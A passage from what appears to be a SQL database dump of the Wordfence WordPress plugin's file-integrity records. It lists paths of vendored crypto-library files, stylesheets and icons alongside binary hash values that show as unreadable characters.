)','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[hkda4p','&!7^@9NBT*8','',0,'?'),('&PDt?5u1Ym','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' =I,','AQTcqPBbt\0','',0,'?'),('N\'!\rBj3','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H!#>bW','&xwαh)œ@5m.)9R','',0,'?'),('F|wZQ,O','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6?\n	:{Q%','ZIK/Iw¥OvyEBi\\$G&','',0,'?'),('O4ǳWQ\0R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>ǈ\"Cix','x眪!}\ZWd','',0,'?'),('.U	Y=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h`VAf','<\\G;1#kLà(փ','',0,'?'),('>GOjPlB','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]\\','ؚx\"o*I\nQjT(G\Z.\Z','',0,'?'),('1-g97','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#fG\rւBg 0','c(k12Qw4?0','',0,'?'),('461mYR','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nH\0u} `','R&Xd[49VI','',0,'?'),('\rX+-Ta','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O>A+=\Z,','UsDMÙd(\0ā~','',0,'?'),(' vbu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Y@_x','ް\Z^3ɟvU.a\r]fhI(sA','',0,'?'),('PJt1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!EP]ǡ;','<\0\rIB=\"P8D\"L~I[','',0,'?'),('wË9/,+1','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g۰/*C,k#','avxu흶j=ISD{!','',0,'?'),('YV29}D8','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CZ?@JN_ji<\Z','<H\"F@%1`7<	}','',0,'?'),('PIcDƾ','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JsǙB','ERJbȸI\"t],qP1\\fD','',0,'?'),('IooԆ5nuѭH','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KAct&',';8%&h1RnJ g0-p\"F1*ts','',0,'?'),('??Q$P.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|K-	','3\\3L\r?B8X\ZN8wCNU=M','',0,'?'),('ƄNB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~dNc@G#,','.\"K|[\0:H/?','',0,'?'),('^&`RyJ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y}Jk>','/O	¹kbz_B]U','',0,'?'),('-췓9ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-glrc]\0','AB-q=3zfRrWM4V)','',0,'?'),('yKv.\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5@?U','Ʊ#q(Ysq)}','',0,'?'),('?HhD0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^R[XITe)','u9 :YnU:syg50=	CW5$eA=','',0,'?'),('\n:X2Lnc','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q(P7APؐdh','N~!)Nc~\\n.lFv','',0,'?'),('Z(|Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QUp~ocÊ4Nt','Lnl2@ΐ>hi,uJYH\\L,B','',0,'?'),('ν}V+tB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','꤀x٠%cl','N8,caeΟi<5p$','',0,'?'),('!Id]5$[~','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL k\'k1','1\\Qt*J%s&','',0,'?'),('\'|?>','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LaDJ?Z','=F==<_%=M?u/','',0,'?'),('IPEXtFH%','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Lv[c)?','Ch!݀F$}wd7b(!pIF.L','',0,'?'),('W= \\\'x\"W}d','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','թK^㥾','M8:naƋGZqQdý!\'&g1','',0,'?'),('ZяݒS','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\Z^ZHG%O','mc;\ny㐲0,5F|=C','',0,'?'),(',zeY#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{ҵGݍ','Y:BP5Ms_.ن֎','',0,'?'),('BKAa<l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XߓŒ\"X36DQ','!l..GI\n7oeѿ\';I\n\n','',0,'?'),('\\\Ze	)Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH\Zb>VDR2','rћJԑI/\nOY}xņU ','',0,'?'),('bq/Fk','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7¤\rFg','nV\'VV)F|*ᑝ2Nz','',0,'?'),('^Sx_?uGD','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hd9<Cˤbl','K.Boࣸvb%S~1K','',0,'?'),('N=f>$KHT','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?G{g','ĀР<W;-\Z񀍙(C+,MUW6','',0,'?'),('/؊!N>\n','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f<_2S^IZ','iݯ8{iq!dՍAz','',0,'?'),('YBWy	+BOmz','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#:N\'DxN','[_|А~E+~E(`_','',0,'?'),('KLx<CHe\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ENĂۛ(\nn','Ѭ}^EF>ڂB','',0,'?'),('F1+\Z#+d{w{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.D6pir`fw=','2KJ73x2M2&+LL','',0,'?'),('ESc+#)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uNmSC{','P~{p}x{82hXx','',0,'?'),('!Plu6CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pe1','T*+z]ʜ;>\n3]?x','',0,'?'),('ia{-\Zؙo','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}<܎s9','Q\'r t7=s*a`<zo_','',0,'?'),('\"8Y74O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','diBDJD5O','NaiB\rAO]@P','',0,'?'),('jֹJ0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p0W\"F)8O','5)&BoK]ػrm`%hO','',0,'?'),('	\")\"0Io','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zq\Zsq776','CDa$=f[Q4JW7l).=%','',0,'?'),('ZLOl','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CFhz','oő\nwnpL+;~t2P*ƃ6','',0,'?'),('d`#)?ϳ0(w','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' oY-)EHd','l,8ETCeylaS;)\'\"d`z','',0,'?'),('G<7et/W','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0Lş\r{VW','\'&ܔ[m`ϊc2E%WGW䉷','',0,'?'),('th	,Gx\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZP}>j ','Mya;>p:/f','',0,'?'),(' GʴGtؑ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lkm>[?','c+ZY:{\nJPc\"{4u#','',0,'?'),('qL>#Q\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BgY',':IZCZ8ȰL]m','',0,'?'),('xLKx 2Is!#Q','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rUCB\"',')M쩂tUδԪF.','',0,'?'),('%#t4x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yW0{XnZ0','\0AVRXȕ~d^/)@R','',0,'?'),('P NtD݌n\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!,^q','X߇pՔZЉֱo\r=˸<!~3','',0,'?'),('$P`\0gX','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF\\2','2ks\\>RI:nHȿDm!zz','',0,'?'),('Z9}.Jk=','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I\Z\nӣ','i>zR@kW6uky','',0,'?'),('Pbw=i','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\ZIw5AlLۢ','K{8fl7sRh嗋I','',0,'?'),('-\'gP\\','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9V#ҹ4','GpfHv\Zx81C[4A','',0,'?'),('AK<jgsr','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Kb(\\pB-','ճ* ʰ	[q˜Pk','',0,'?'),(' ލ<:9|6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_b->O\\苃','sɔg%riCPw%{J','',0,'?'),('vLM.f%OMR','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4V+=?k\r','_x:nOsO:d\'\0N=k','',0,'?'),('͍ρbB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%0\\L-','bhppv״O#u 5/=9ň)','',0,'?'),('oC\"Qty','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+%','4!H:6>lEEc#a{A{','',0,'?'),('*b*ee','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\\8zM~.','vR\0S~[\rҮ6o:Ś\r]','',0,'?'),('HY6oD{LH','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zl쇌1gE',';}-\Z	Ud)sD%R','',0,'?'),('➞^՘R','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ohg[','߁.-h4`9S _\r)I(W','',0,'?'),('%$MqT<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUO\ZߠxtH','G\n\"_/Agh	U?SsHבYٳ','',0,'?'),('̙~Ȍî+byȁ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{숊z;5!','D\ZLޠΔa]n\nL&\n','',0,'?'),('K0\rܐcn','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÅKW<S\Z|r_','E`w`>.2V\"\0Mp\r 9','',0,'?'),('?U\'_l.p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B	IN-y','hl[(l~QuFM	','',0,'?'),('gxAȢ}g','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zIjcYKC\0','PRV*Īi}kVX','',0,'?'),(']*.>`Ef','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kFh瀁1-','6!omݎ^.^@˨v7	I}','',0,'?'),('l/<UZA','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͣrZw','#J<L6zqN0f8Z','',0,'?'),('-\\[Jץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F1	M]','A8{!Vt<SqHoh4y`By','',0,'?'),('of?3P1\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/OY\'','8eTet\r jP/J<^rӥz','',0,'?'),('71}\n','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','12+;FнNM','w\"*5U T@nyȳ^au\'','',0,'?'),('wy*XO\nG','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NVl~m[%Wt','Pq\0V{|0m\0;2f@U','',0,'?'),('W8h!ɩkĉ\'','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rRUb*\0\'','x<sBZ2jRM\'0%$i{ V','',0,'?'),('ͥ`FJSu','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+UŸ(5\\','8:oI9,=zDk8;{A{\Zij','',0,'?'),('Ia\n؎a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\Z\Z+,','*y$MQ[q:h\")XTC\0\\k','',0,'?'),('cYF}j`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3b(浏К','n;<	Ǖ-Wt]<su','',0,'?'),('u_~!\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY992','6\Z/py5EحOE','',0,'?'),('o	lѴcd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n@LjwD','\r8d8sڇ6FȌ','',0,'?'),('~+qX\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oaQ|g4&','cUX+]Wvd=,Z0)\\','',0,'?'),('h]CA*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZbO6IcD','`ude?s7dCQ}Y/','',0,'?'),('_npaV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L1˵\"k%F+','ZiMfUvi-})f\"Mnd?X','',0,'?'),('Xp~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Woe~oB2_;','5qSrL]OXsq+l<ɒ','',0,'?'),('A?]\\8PMTl','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CB)cae','[}D\0OV:~-\"~mBh\"<pW','',0,'?'),('BPXW6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' QAL󚜆U','G\n<.\ZWrʪØ)','',0,'?'),('[\'/;','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D2E\\t.-','U\n/miMyE-QM^\0QL9hT','',0,'?'),('a@WrQwZ\n.','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܑzg<N\n?o6f','REgX3JAc!a_S{','',0,'?'),(' K iDt','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zz#H','n]x\Z_ѪkB-a&̃','',0,'?'),('_#U1pGS','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zrtw(e','ҿDI<^i2dW]G_-+A8W','',0,'?'),('?FϸAR1','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pԏd0lN&7+','^s\n@G,ږ\n;|3P	nԔ/\rzA\"\nd','',0,'?'),('/	E:KR寥v','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Vή?b4','=ޣ4:$dXWRXN >','',0,'?'),('z9	`d3\0Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' @^8J','ؽ@B-Km-Ȼ\Z2p','',0,'?'),('B@R*GxF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'_?Sş\Z]y','6[-,9YRr\rY\"-an6$','',0,'?'),('GGa\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ÕmANR',' *J/(sg YD]و̨|\0z','',0,'?'),('aJr&-D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b]݆щpW','ド$⨇\r׶oޖGǗq#7','',0,'?'),('XX*!2~','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƌ@N`Xg','Q&3Ɓ_+i	uqI+:	IO','',0,'?'),('TL ߈,]զm','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8	:{We','6{w^GkΫ25b\r񓫄','',0,'?'),('`p;AQA,.(','wp-content/plugins/wordfence/css/activity-report-widget.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J^x;yc','ӡfaMWv+W%}`DN','',0,'?'),('Zf1Gjtf#b','wp-content/plugins/wordfence/css/diff.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g		$`rQ','$hEJ^54<$ӭYc&','',0,'?'),('\\+9&4;<','wp-content/plugins/wordfence/css/dt_table.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gJbjJ9k:','o[PHyЊ}iGc~<cDR:D','',0,'?'),('\nj3p','wp-content/plugins/wordfence/css/fullLog.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e.i`΁Uv','?>?hξ[²Pu{puaa','',0,'?'),('hr\Z;%e-x','wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GJu;QZ6','\\MUKhQwCiVJ\'','',0,'?'),('2v\'9\rz','wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pbD@pG+','*DZ>Bg&YY4(</','',0,'?'),('\Z R[\'>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\c7yxгl','~qV*\'1]3^m','',0,'?'),('2r}Vĥ$^n/','wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^n=(&݂N&','SDIBz_-?(YpEyƹA','',0,'?'),('\\7Qo','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%;wQ8@','wi>6Ƭ4.NC\Z4IO','',0,'?'),('vO#JN+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$2J','/#?TiOLyvuTKɤ\\ػ','',0,'?'),('f\'Up1Bv','wp-content/plugins/wordfence/css/iptraf.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ebf.\nV[xPh','J-@ ]-	cqWQ$8','',0,'?'),('zL%n\n:','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ef#`P~7n','-mznNFE\0ѭ\\vqsL?Z\Z','',0,'?'),('x$\ryH\\','wp-content/plugins/wordfence/css/jquery-ui.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}O^0tGGQ','ٍ$rb=phxK5]8QRjn4','',0,'?'),('DX9.q','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#/h<U','ni뗅NvX7Y]D','',0,'?'),('K.OL2Id','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bK0bxљ]','4\ncE2=V{+\\goЅO','',0,'?'),('L\rSAU0','wp-content/plugins/wordfence/css/main.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0e\0wnX%ٌ%','E}]yz)IwzMO\'ȇm','',0,'?'),('`QdMwdT@','wp-content/plugins/wordfence/css/phpinfo.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Q!0w/蓴','a@|I\r=\Z^εd)[W','',0,'?'),('H	